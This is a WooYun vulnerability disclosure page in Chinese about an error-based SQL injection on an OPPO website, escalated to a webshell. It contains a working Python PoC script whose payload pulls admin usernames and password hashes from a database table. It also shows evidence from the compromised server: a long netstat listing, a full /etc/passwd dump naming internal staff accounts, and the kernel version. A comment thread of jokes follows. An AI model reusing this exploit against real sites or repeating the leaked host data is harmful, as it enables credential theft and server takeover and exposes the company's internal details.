当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0179078

漏洞标题:oppo官网某站报错注入(附python POC脚本)至GETSHELL

相关厂商:广东欧珀移动通讯有限公司

漏洞作者: Mr.Q

提交时间:2016-02-27 12:57

修复时间:2016-03-03 13:00

公开时间:2016-03-03 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-27: 细节已通知厂商并且等待厂商处理中
2016-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

oppo官网某站报错注入(附python POC脚本)至GETSHELL

详细说明:

oppo某站存在报错注入

QQ20160227-6.png


QQ20160227-7.png


附python脚本

#!/usr/bin/env python
#coding:utf-8
__author__ = 'Lu'
import urllib2
import urllib
import sys
import hashlib
import re
def verify(url):
target = "%s/showroom.php?act=get_store&sell_district_id=1" % url
payload = " AND (SELECT 1879 FROM(SELECT COUNT(*),CONCAT(0x71626b7071,(select concat(0x23,0x23,username,0x23,0x23,password,0x23,0x23) from bd_admin where id=1 limit 1),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
poc = target + payload
try:
# 发送 HTTP 请求
req = urllib2.Request(poc)
response = urllib2.urlopen(req)
s = "Duplicate entry \'qbkpq(.*?)qqvxq1\'"

if response:
# 处理 响应
data = response.read()
result = re.findall(s,data)
print "用户名#密码是 : %s" % result
except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()


md5解密 后台登录

QQ20160227-8.png


QQ20160227-9.png


GETSHELL

mask 区域
1.http://**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/a.php


QQ20160227-10.png


netstat -an | grep ESTABLISHED
tcp 0 0 192.168.0.21:36555 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:34326 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:80 192.168.2.5:35409 ESTABLISHED
tcp 0 0 192.168.0.21:32790 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:46251 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:38925 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:45137 218.75.154.137:443 ESTABLISHED
tcp 0 0 192.168.0.21:58753 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:39190 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:48091 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:55740 115.231.159.133:443 ESTABLISHED
tcp 0 0 192.168.0.21:45189 218.75.154.137:443 ESTABLISHED
tcp 0 0 192.168.0.21:53638 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:52250 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:37587 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:44610 198.11.178.243:23333 ESTABLISHED
tcp6 0 0 192.168.0.21:35940 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54957 117.79.131.86:80 ESTABLISHED
tcp6 0 0 192.168.0.21:58796 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46477 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39783 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57555 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58802 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:41560 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39498 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46070 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58944 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51262 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45042 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58806 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:51920 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:50305 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46040 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58789 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:33979 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:55702 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:53109 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:55918 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:32812 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33143 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:56389 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58599 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38080 192.168.0.23:46720 ESTABLISHED
tcp6 0 0 192.168.0.21:34809 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:58788 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:49518 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57459 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:41422 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57341 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41157 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57492 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46360 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:53509 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46852 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51921 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34070 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57646 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38595 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44697 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58797 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:42793 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47552 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47160 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36648 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34582 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47731 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40307 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33262 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:56565 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58803 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46052 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:40891 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45844 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36269 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54774 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33626 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58519 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58545 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49201 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57074 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39782 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:36481 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44995 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57460 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57351 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49513 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:54684 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34811 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:49514 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:33639 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:35645 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36793 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:48795 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54505 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34482 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57459 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57743 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36484 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40622 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:42534 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57544 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:42616 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39726 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54105 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58800 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:59511 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57497 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:60372 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57463 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:58804 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:48340 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41836 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46622 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:43033 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46064 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:48010 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:37545 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58668 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:43163 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51356 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:50538 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:56898 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38542 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44322 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49519 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:42243 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34627 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41580 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40344 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58807 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46556 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58791 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:40103 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51898 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54728 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54487 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45534 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38268 123.125.115.18:443 ESTABLISHED


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
#jhshi:x:1000:1000:,,,:/home/jhshi:/bin/bash
ychen:x:1001:1001:,,,:/home/ychen:/bin/bash
#mzhou:x:1002:1002:,,,:/home/mzhou:/bin/bash
nagios:x:104:106::/var/lib/nagios:/bin/false
nginx:x:105:107:nginx user,,,:/nonexistent:/bin/false
mysql:x:106:108:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:107:109::/var/run/dbus:/bin/false
#xtjiao:x:1003:1003:,,,:/home/xtjiao:/bin/bash
#zwzheng:x:1004:1004:,,,:/home/zwzheng:/bin/bash
syncer:x:1005:1005:,,,:/home/syncer:/bin/bash
sphinxsearch:x:108:110:Sphinx fulltext search service,,,:/var/run/sphinxsearch:/bin/false
redis:x:109:111:redis server,,,:/var/lib/redis:/bin/false
hwang:x:1006:1006:,,,:/home/hwang:/bin/bash
lchen:x:1007:1007:,,,:/home/lchen:/bin/bash
hbai:x:1002:1009:,,,:/home/hbai:/bin/bash
avahi:x:110:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
tomcat55:x:111:65534::/usr/share/tomcat5.5:/bin/false
mjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bash
qxu:x:1003:1010:,,,:/home/qxu:/bin/bash
wjzhu:x:1004:1011:,,,:/home/wjzhu:/bin/bash
cywang:x:1008:1012:,,,:/home/cywang:/bin/bash
zjli:x:1009:1013::/home/zjli:/bin/sh
yfhu:x:1010:1014::/home/yfhu:/bin/sh
ljni:x:1011:1015::/home/ljni:/bin/sh


内核:Linux hz97-164-21 2.6.32-5-amd64

QQ20160227-4.png


QQ20160227-5.png


漏洞证明:

已经证明

修复方案:

你们专业

版权声明:转载请注明来源 Mr.Q@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-03 13:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-02-27 13:05 | Mark0smith ( 普通白帽子 | Rank:113 漏洞数:48 )

    充电五分钟,挖洞两小时

  2. 2016-02-27 13:10 | 木易 ( 普通白帽子 | Rank:110 漏洞数:25 | 历代鬼谷子虽一人之力,却强于百万之师。一...)

    挖洞两小时 ,提交五分钟。

  3. 2016-02-27 13:58 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    提交五分钟,确认两小时.

  4. 2016-02-27 14:00 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    确认两小时,修复五分钟.

  5. 2016-02-27 14:01 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    修复五分钟,批斗两小时.

  6. 2016-02-27 14:02 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    批斗两小时,反省五分钟.

  7. 2016-02-27 14:04 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    反省五分钟,警醒两小时.

  8. 2016-02-27 14:04 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    警醒两小时,忘记五分钟.

  9. 2016-02-27 14:05 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    请问一共用了多少分钟

  10. 2016-02-27 14:07 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:933 漏洞数:107 )

    265分钟

  11. 2016-02-27 14:10 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @玉林嘎 1000分钟分钟

  12. 2016-02-27 18:08 | 乌云来了 打雷啦 ( 实习白帽子 | Rank:34 漏洞数:5 | 乌云来了 打雷啦)

    前排学习大神

  13. 2016-02-28 22:17 | 乌云大嫖客 ( 路人 | Rank:4 漏洞数:1 | 鄙人可是装逼界第一高手)

    围观五分钟,装逼两小时。